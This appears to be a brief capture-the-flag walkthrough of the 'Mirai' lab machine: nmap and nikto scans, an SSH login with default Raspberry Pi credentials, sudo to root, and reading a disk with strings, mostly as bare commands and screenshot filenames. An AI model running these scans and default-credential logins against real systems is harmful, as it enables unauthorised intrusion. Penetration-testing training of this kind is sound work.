nmap -A -p- -oA output 10.129.167.2 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mirai 10.129.167.2

nmap -sU -O -p- -oA mirai-udp 10.129.167.2

nikto -h 10.129.159.31:80

Pasted image 20220122163721.png

Pasted image 20220122163954.png

http://10.129.167.2/

Pasted image 20220122163516.png

curl -s -X GET "http://10.129.167.2/" -I

Pasted image 20220122163611.png

Credenciales-> pi:raspberry

ssh pi@10.129.167.2

Pasted image 20220122164152.png

sudo su

Pasted image 20220122164339.png

df -h

strings /dev/sdb

Pasted image 20220122165309.png

boxes

copyright©2022 Cu3rv0x all rights reserved